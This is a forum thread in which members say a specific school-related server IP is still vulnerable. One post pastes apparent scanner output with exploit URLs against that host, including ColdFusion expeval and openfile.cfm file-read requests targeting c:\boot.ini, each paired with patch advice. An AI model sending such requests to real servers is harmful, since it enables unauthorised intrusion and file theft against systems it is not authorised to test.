Update

Thread: Update

  1. #1
    Senior Member
    Join Date
    Dec 2001
    Posts
    304

    Update

    If you remember, a while back there was a post called k12.edu.
    The post was about being able to run arbitrary code on their server.
    [ http://www.antionline.com/showthread...hreadid=218780 ]

    I just checked the website to see what it was, and I was curious if they ever fixed it.

    I went to http://216.247.78.24 and it came up with some NT service pack update page,
    so then I went to http://216.247.78.24:80 and got this
    [see attachment or go to page]

    Guess they never fixed it
    Violence breeds violence
    we need a world court
    not a republican with his hands covered in oil and military hardware lecturing us on world security!

  2. #2
    Banned
    Join Date
    Oct 2001
    Posts
    1,462
    Guess not
    This is the problem with sites like this, a few of them ruin it for everybody else... And they probably used that same exploit, too

  3. #3
    Banned
    Join Date
    Oct 2001
    Posts
    1,462
    Security Issues

    http://216.247.78.24/scripts/*%0a.pl

    Perl.exe is being used as the perl script interpreter - consequently virtual paths can be mapped to physical paths: The /scripts directory maps to d:\216.247.78.24\scripts\. Use PerlIS.dll instead of perl.exe to resolve this problem.


    http://216.247.78.24//_vti_pvt/doctodep.btr

    doctodep.btr can sometimes contain fragments of server side code.


    http://216.247.78.24//cfdocs/expeval...th=c:\boot.ini

    ExprCalc.cfm can be used to read files on the web server. Apply the patch from Allaire. See http://www2.l0pht.com/advisories/cfusion.txt for more information.


    http://216.247.78.24//cfdocs/expeval/openfile.cfm

    openfile.cfm can be used to read files on the web server. Apply the patch from Allaire. See http://www2.l0pht.com/advisories/cfusion.txt for more information.

    This sucks ass.... It took me about 3 seconds to find all of these. I think they really need security.
